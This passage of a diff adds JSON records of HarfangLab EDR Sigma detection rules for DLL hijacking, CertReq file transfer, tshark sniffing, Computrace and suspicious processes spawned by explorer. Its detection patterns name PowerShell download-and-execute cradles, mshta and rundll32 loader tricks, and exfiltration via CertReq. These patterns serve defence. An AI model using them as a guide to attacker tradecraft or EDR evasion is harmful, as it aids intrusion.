"whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.606892Z", + "creation_date": "2026-03-23T11:45:34.606895Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.606903Z", + "rule_level": "low", + "rule_confidence": "moderate", + 
"rule_confidence_override": null, + "references": [ + "https://securelist.com/absolute-computrace-revisited/58278/", + "https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf", + "https://attack.mitre.org/techniques/T1569/002/" + ], + "name": "t1569_002_computrace_rpcnetp.yml", + "content": "title: Computrace Agent Started\nid: 2fe027bc-7a3c-412a-9493-8581215d5157\ndescription: |\n Detects the execution of rpcnet.exe or rpcnetp.exe which is the Computrace Agent (Communication Driver Agent).\n Computrace (aka LoJack) is an Absolute Sotfware solution used to trace stolen laptops.\n Attackers can use Computrace a backdoor that can survive a reinstallation of the whole OS.\n It recommended to disable this rule if the IT covered by HarfangLab EDR legitimately uses Computrace as an anti-theft solution.\n If the IT does not use Computrace, it is recommended to analyze the behavior of the launched binary to look for malicious actions or network connections.\nreferences:\n - https://securelist.com/absolute-computrace-revisited/58278/\n - https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf\n - https://attack.mitre.org/techniques/T1569/002/\ndate: 2022/09/02\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.Computrace\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image:\n - '?:\\Windows\\System32\\rpcnetp.exe'\n - '?:\\Windows\\SysWOW64\\rpcnet.exe'\n ParentImage: '?:\\Windows\\System32\\services.exe'\n condition: selection\nlevel: low\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2fe027bc-7a3c-412a-9493-8581215d5157", + "rule_name": 
"Computrace Agent Started", + "rule_description": "Detects the execution of rpcnet.exe or rpcnetp.exe which is the Computrace Agent (Communication Driver Agent).\nComputrace (aka LoJack) is an Absolute Sotfware solution used to trace stolen laptops.\nAttackers can use Computrace a backdoor that can survive a reinstallation of the whole OS.\nIt recommended to disable this rule if the IT covered by HarfangLab EDR legitimately uses Computrace as an anti-theft solution.\nIf the IT does not use Computrace, it is recommended to analyze the behavior of the launched binary to look for malicious actions or network connections.\n", + "rule_creation_date": "2022-09-02", + "rule_modified_date": "2025-01-30", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1569.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2ffd5e79-150c-4383-847e-9e74ca72179a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.599622Z", + "creation_date": "2026-03-23T11:45:34.599625Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.599633Z", + "rule_level": 
"high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/xforcered/WFH", + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_ldifd.yml", + "content": "title: DLL Hijacking via ldifd.exe\nid: 2ffd5e79-150c-4383-847e-9e74ca72179a\ndescription: |\n Detects potential Windows DLL Hijacking via ldifd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ldifde.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\urlmon.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft 
Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2ffd5e79-150c-4383-847e-9e74ca72179a", + "rule_name": "DLL Hijacking via ldifd.exe", + "rule_description": "Detects potential Windows DLL Hijacking via ldifd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "3032fc60-f2f1-46ff-98c0-f6b537fe7513", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:34.626639Z", + "creation_date": "2026-03-23T11:45:34.626641Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.626646Z", + "rule_level": "high", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/", + "https://www.zscaler.com/blogs/security-research/steal-it-campaign", + "https://attack.mitre.org/techniques/T1204/001/", + "https://attack.mitre.org/techniques/T1204/002/" + ], + "name": "t1204_001_suspicious_process_parent_explorer.yml", + "content": "title: Suspicious Process Started by Explorer\nid: 3032fc60-f2f1-46ff-98c0-f6b537fe7513\ndescription: |\n Detects the execution of suspicious processes spawned directly by explorer.exe, which commonly indicates that a user has clicked on a malicious link or attachment.\n This pattern is frequently observed in phishing attacks where malicious files or URLs trigger the execution of dangerous processes like powershell.exe, cmd.exe, or unusual script interpreters with explorer.exe as the parent.\n It is recommended to analyze the process command-line and file origin (by looking at the file downloads telemetry, for example).\nreferences:\n - https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/\n - https://www.zscaler.com/blogs/security-research/steal-it-campaign\n - https://attack.mitre.org/techniques/T1204/001/\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2021/06/18\nmodified: 2026/01/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.001\n - attack.t1204.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_explorer:\n ParentImage|endswith: 
'\\explorer.exe'\n\n # cmd.exe\n selection_cmd:\n - Image|endswith: '\\cmd.exe'\n - OriginalFileName: 'Cmd.Exe'\n\n selection_cmd_1_1:\n CommandLine|contains : '/c '\n\n selection_cmd_1_2:\n CommandLine|contains:\n - '%comspec% '\n - 'cmd.exe /c start '\n - 'cmd.exe /c ?start '\n - 'attrib '\n - 'mshta '\n - 'findstr '\n\n selection_cmd_2_1:\n CommandLine|contains: '/c '\n\n selection_cmd_2_2:\n CommandLine|contains:\n - 'powershell'\n - 'p^o^w^e^r^s^h^e^l^l'\n\n selection_cmd_2_3:\n CommandLine|contains:\n - 'bypass '\n - 'WriteAllbytes'\n - 'FromBase64String'\n - ' iex '\n\n exclusion_cmd:\n CommandLine|contains:\n - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n - '* ?:\\Windows\\system32\\ie4uinit.exe -ClearIconCache'\n - 'cmd.exe /c start cmd.exe /k pushd '\n - '?:\\Windows\\System32\\cmd.exe /c start shell:AppsFolder\\Microsoft.MicrosoftEdge_?????????????!MicrosoftEdge -private'\n - '?:\\Windows\\System32\\cmd.exe /c start /min /d ?:\\Users\\\\*\\AppData\\Local\\PDFProSuite PDFProSuite . --update'\n\n # powershell.exe\n selection_powershell_image:\n - Image|endswith: 'powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_powershell_commandline:\n CommandLine|contains:\n - 'DownloadFile'\n - 'DownloadString'\n - 'invoke-webrequest'\n - 'iwr'\n - '-join'\n - '-replace '\n - 'Start-Process rundll32'\n - 'Expand-Archive '\n - '::ReadAllBytes(*::WriteAllBytes('\n - ' -WindowStyle Hidden *Start-Process ?:\\' # C:\\\n - ' -WindowStyle Hidden *Start-Process ??:\\' # 'C:\\\n\n exclusion_powershell:\n CommandLine|contains:\n - ' Process Bypass '\n - ' -file ?:\\'\n - ' -file \"\\\\\\\\'\n - ' -command ?:\\'\n - \"}) -replace '\\\\s\\\\s+',\"\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy ByPass -NoExit -Command & ??:\\\\*\\anaconda3\\shell\\condabin\\conda-hook.ps1? 
; conda activate ??:\\\\*\\anaconda3?'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy ByPass -NoExit -Command & ??:\\Users\\\\*\\Miniconda3\\shell\\condabin\\conda-hook.ps1? ; conda activate ??:\\\\*\\Miniconda3'\n - \"?:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command & '?:\\\\Program Files (x86)\\\\LastPass\\\\AppxUpgradeEdge.ps1'\"\n\n # mshta.exe\n selection_mshta_image:\n - Image|endswith: '\\mshta.exe'\n - OriginalFileName: 'MSHTA.EXE'\n\n selection_mshta_commandline:\n CommandLine|contains:\n - 'http'\n - 'javascript'\n\n # wmic.exe\n selection_wmic_image:\n - Image|endswith: 'wmic.exe'\n - OriginalFileName: 'wmic.exe'\n\n selection_wmic_commandline:\n CommandLine|contains: 'format'\n\n # msiexec.exe\n selection_msiexec_image:\n - Image|endswith: 'msiexec.exe'\n - OriginalFileName: 'msiexec.exe'\n\n selection_msiexec_commandline:\n CommandLine|contains: '/q '\n\n # rundll32.exe\n selection_rundll32:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n\n selection_rundll32_1:\n CommandLine|contains: '%comspec% '\n selection_rundll32_2:\n CommandLine|contains|all:\n - 'vfcuzzz.dll'\n - 'CuzzSetDebugLoweringPoint'\n selection_rundll32_3:\n CommandLine|contains|all:\n - 'KM.FileSystem.dll'\n - 'KMGetInterface'\n selection_rundll32_4:\n CommandLine|contains|all:\n - 'diassvcs.dll'\n - 'InitializeComponent'\n selection_rundll32_5:\n CommandLine|contains|all:\n - 'GraphicalComponent.dll'\n - 'VisualServiceComponent'\n selection_rundll32_6:\n CommandLine|contains|all:\n - 'MsDiskMountService.dll'\n - 'DiskDriveIni'\n selection_rundll32_7:\n CommandLine|contains|all:\n - 'advpack.dll'\n - 'RegisterOCX'\n selection_rundll32_8:\n CommandLine|contains|all:\n - '\\\\\\\\'\n - ',0'\n selection_rundll32_9:\n CommandLine|contains|all:\n - 'alomart.dll'\n - 'PluginInit'\n\n # wscript.exe\n 
selection_wscript_image:\n - Image|endswith: '\\wscript.exe'\n - OriginalFileName: 'wscript.exe'\n\n selection_wscript_commandline:\n CommandLine|contains: ' /b '\n\n # odbcconf.exe\n selection_odbcconf_image:\n - Image|endswith: '\\odbcconf.exe'\n - OriginalFileName: 'odbcconf.exe'\n\n selection_odbcconf_commandline:\n CommandLine|contains:\n - 'odbcconf '\n - 'odbcconf.exe '\n\n condition: selection_explorer and (\n (selection_cmd and (all of selection_cmd_1_* or all of selection_cmd_2_*) and not exclusion_cmd) or\n (all of selection_powershell_* and not exclusion_powershell) or\n (all of selection_mshta_*) or\n (all of selection_wmic_*) or\n (all of selection_msiexec_*) or\n (selection_rundll32 and 1 of selection_rundll32_*) or\n (all of selection_wscript_*) or\n (all of selection_odbcconf_*)\n )\nlevel: high\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "3032fc60-f2f1-46ff-98c0-f6b537fe7513", + "rule_name": "Suspicious Process Started by Explorer", + "rule_description": "Detects the execution of suspicious processes spawned directly by explorer.exe, which commonly indicates that a user has clicked on a malicious link or attachment.\nThis pattern is frequently observed in phishing attacks where malicious files or URLs trigger the execution of dangerous processes like powershell.exe, cmd.exe, or unusual script interpreters with explorer.exe as the parent.\nIt is recommended to analyze the process command-line and file origin (by looking at the file downloads telemetry, for example).\n", + "rule_creation_date": "2021-06-18", + "rule_modified_date": "2026-01-14", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1204.001", + "attack.t1204.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": 
"30336e99-9891-408e-b3a7-c5f83d445417", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.603534Z", + "creation_date": "2026-03-23T11:45:34.603537Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.603545Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certreq", + "https://attack.mitre.org/techniques/T1105/" + ], + "name": "t1105_certreq_lolbas_file_transfer.yml", + "content": "title: File Downloaded or Uploaded via CertReq\nid: 30336e99-9891-408e-b3a7-c5f83d445417\ndescription: |\n Detects a suspicious execution of the CertReq executable to download or exfiltrate a file.\n Adversaries may transfer tools or other files to a compromised environment using legitimate tool to evade detection.\n It is recommended to check the content of the downloaded file and for other suspicious behavior by the parents of the current process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Certreq\n - https://attack.mitre.org/techniques/T1105/\ndate: 2025/06/17\nmodified: 2025/06/17\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - 
attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.CertReq\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\CertReq.exe'\n # Renamed binaries\n - OriginalFileName: 'CertReq.exe'\n\n selection_cmdline:\n CommandLine|contains|all:\n - '?Post'\n - '?config'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "30336e99-9891-408e-b3a7-c5f83d445417", + "rule_name": "File Downloaded or Uploaded via CertReq", + "rule_description": "Detects a suspicious execution of the CertReq executable to download or exfiltrate a file.\nAdversaries may transfer tools or other files to a compromised environment using legitimate tool to evade detection.\nIt is recommended to check the content of the downloaded file and for other suspicious behavior by the parents of the current process.\n", + "rule_creation_date": "2025-06-17", + "rule_modified_date": "2025-06-17", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1105", + "attack.t1218" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "3076adfe-ea41-40f9-84c8-262457ee7219", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.594714Z", + "creation_date": "2026-03-23T11:45:34.594717Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.594725Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://wietze.github.io/blog/save-the-environment-variables", + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_cacls.yml", + "content": "title: DLL Hijacking via CACLS.exe\nid: 3076adfe-ea41-40f9-84c8-262457ee7219\ndescription: |\n Detects potential Windows DLL Hijacking via CACLS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - 
classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CACLS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\ntmarta.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\\\*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft\\EdgeWebView\\Application\\\\*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "3076adfe-ea41-40f9-84c8-262457ee7219", + "rule_name": "DLL Hijacking via CACLS.exe", + "rule_description": "Detects potential Windows DLL Hijacking via CACLS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + 
"rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "307b0642-85e4-4475-95de-240e2cbc5108", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.618890Z", + "creation_date": "2026-03-23T11:45:34.618892Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.618896Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_bitlockerwizard.yml", + "content": "title: DLL Hijacking via BitLockerWizard.exe\nid: 307b0642-85e4-4475-95de-240e2cbc5108\ndescription: |\n Detects potential Windows DLL Hijacking via BitLockerWizard.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by 
copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BitLockerWizard.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\fvewiz.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "307b0642-85e4-4475-95de-240e2cbc5108", + "rule_name": "DLL Hijacking via BitLockerWizard.exe", + "rule_description": "Detects potential Windows DLL Hijacking via BitLockerWizard.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded 
library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "3085e5ea-4be0-4a6c-b0e8-442cc81ed08f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.094233Z", + "creation_date": "2026-03-23T11:45:34.094235Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.094239Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md#atomic-test-3---packet-capture-macos-using-tcpdump-or-tshark", + "https://attack.mitre.org/techniques/T1040/" + ], + "name": "t1040_network_sniffing_tshark_macos.yml", + "content": "title: Network Sniffed via tshark (macOS)\nid: 
3085e5ea-4be0-4a6c-b0e8-442cc81ed08f\ndescription: |\n Detects the execution of tshark, a protocol analyzer used to capture and analyze network traffic.\n It is often used to help troubleshoot network issues, but adversaries can use it to sniff network traffic and capture information about an environment, including authentication material passed over the network.\n It is recommended to investigate activity surrounding this alert to determine if the usage of this software is legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md#atomic-test-3---packet-capture-macos-using-tcpdump-or-tshark\n - https://attack.mitre.org/techniques/T1040/\ndate: 2024/05/10\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Tool.Tshark\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: '/tshark'\n\n exclusion_cellar_data_analysis:\n ParentImage|endswith: 'opt/homebrew/Cellar/python@3.??/3.*/Frameworks/Python.framework/Versions/3.??/Resources/Python.app/Contents/MacOS/Python'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "3085e5ea-4be0-4a6c-b0e8-442cc81ed08f", + "rule_name": "Network Sniffed via tshark (macOS)", + "rule_description": "Detects the execution of tshark, a protocol analyzer used to capture and analyze network traffic.\nIt is often used to help troubleshoot network issues, but adversaries can use it to sniff network traffic and capture information about an environment, including authentication material passed over the network.\nIt is recommended to investigate activity surrounding this alert 
